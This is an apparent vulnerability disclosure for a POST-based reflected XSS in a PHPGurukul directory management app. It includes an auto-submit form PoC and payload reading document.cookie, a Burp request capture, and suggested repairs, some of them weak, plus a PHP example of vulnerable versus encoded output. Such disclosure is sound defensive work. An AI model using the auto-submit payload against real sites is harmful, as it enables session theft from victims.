
PHPGurukul Directory Management System Project - POST-based Reflected XSS in /searchdata.php #4

@bitborne

Description


PHPGurukul Directory Management System Project - POST-based Reflected XSS in /searchdata.php

NAME OF AFFECTED PRODUCT(S)

  • Directory Management System

Vendor Homepage

AFFECTED AND/OR FIXED VERSION(S)

Submitter

  • -Schatten-

Vulnerable Component

  • /searchdata.php

VERSION(S)

  • V2.0

Software Link

PROBLEM TYPE

Vulnerability Type

  • Cross-Site Scripting (XSS) - POST-based Reflected

Root Cause

  • The search form, submitted via POST, fails to sanitize the user-controlled "searchdata" parameter. The server reflects the unsanitized value directly into the HTML response, so a specially crafted POST request executes arbitrary JavaScript in the victim's browser.

Impact

  • Attackers can create malicious HTML forms or use JavaScript auto-submit techniques to exploit this vulnerability. Successful exploitation leads to session hijacking, CSRF attacks, and full client-side compromise. Although exploitation requires user interaction, phishing techniques make this feasible.

DESCRIPTION

  • The POST-based XSS vulnerability in Directory Management System's search functionality allows injecting JavaScript payloads through the "searchdata" parameter. Unlike GET-based XSS, attackers must trick users into submitting a malicious form, but the severity remains critical due to modern attack vectors like:
    • Hosting malicious form on phishing pages
    • Using XMLHttpRequest to auto-submit POST data
    • Exploiting through iframe injections

Exploitation requires user interaction but no authentication

Vulnerability details and POC

Vulnerability location:

  • POST parameter "searchdata" in form submission

Exploitation Flow:

  1. Attacker creates an auto-submit form:
<form id="xss" action="https://victim.com/searchdata.php" method="POST">
  <input type="hidden" name="searchdata" value="<img src=x onerror=alert(document.cookie)>">
</form>
<script>document.getElementById('xss').submit();</script>
  2. Victim visits attacker's page containing this code

Burp Request Capture:

POST /Directory%20Management%20System%20PHP/dms/searchdata.php HTTP/1.1
Host: 172.20.10.4
Content-Length: 65
Cache-Control: max-age=0
Origin: null
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive

searchdata=%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3E

Proof-of-Concept Evidence:

(Two screenshots in the original issue: the Burp request above and the alert(document.cookie) dialog rendered in the browser response.)

Suggested repair

  1. Strict Content-Type Enforcement (server-side, PHP):
// Reject requests whose body is not a plain form submission.
if ($_SERVER['CONTENT_TYPE'] !== 'application/x-www-form-urlencoded') {
    die("Invalid request");
}
  2. DOM-based Sanitization (client-side JavaScript, applied before the value is written into the DOM):
function sanitizeInput(input) {
    // Replace the five HTML-significant characters with their entities.
    return input.replace(/[<>"'&]/g, function (char) {
        return {'<':'&lt;', '>':'&gt;', '"':'&quot;', '\'':'&#39;', '&':'&amp;'}[char];
    });
}
  3. CSRF Token Integration (hidden field in the search form; generateSecureToken() stands for the application's own token generator):
<input type="hidden" name="csrf_token" value="<?= generateSecureToken() ?>">
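The reflection described under Root Cause, shown in PHP next to the hardened version of the same handler, as an added example that is not part of this report or of the PHPGurukul code base. It assumes the handler echoes $_POST['searchdata'] straight into the page; the function names are mine. A Content-Type check or client-side escaping does not change what the server reflects, so the encoding at the echo point is the change that closes the bug.

```php
<?php
// Added example, not PHPGurukul's code. It assumes the handler reads
// $_POST['searchdata'] and echoes it into the HTML response, as the
// root cause above describes, and shows the same handler hardened.

// Vulnerable pattern: the raw POST value is concatenated into the page.
function render_search_vulnerable(array $post): string
{
    $term = $post['searchdata'] ?? '';
    return '<p>Results for: ' . $term . '</p>';
}

// Output encoding for an HTML text or attribute context. ENT_QUOTES also
// encodes ' and " so the value is safe inside quoted attributes; the
// explicit charset avoids encoding mismatches.
function html_encode(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Fixed pattern: the value is encoded at the point where it is reflected.
function render_search_fixed(array $post): string
{
    $term = is_string($post['searchdata'] ?? null) ? $post['searchdata'] : '';
    return '<p>Results for: ' . html_encode($term) . '</p>';
}

// Per-session CSRF token (what the generateSecureToken() placeholder above
// would return) and its check. hash_equals() is a constant-time comparison.
function generate_csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

function csrf_token_valid(array $post, array $session): bool
{
    $sent = $post['csrf_token'] ?? '';
    $expected = $session['csrf_token'] ?? '';
    return is_string($sent) && $expected !== '' && hash_equals($expected, $sent);
}

// Constructed sample: the decoded form of the Burp request body above.
$sample = ['searchdata' => '<img src=x onerror=alert(document.cookie)>'];
echo render_search_vulnerable($sample), PHP_EOL; // tag reaches the browser live
echo render_search_fixed($sample), PHP_EOL;      // &lt;img src=x ...&gt; shown as text
```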
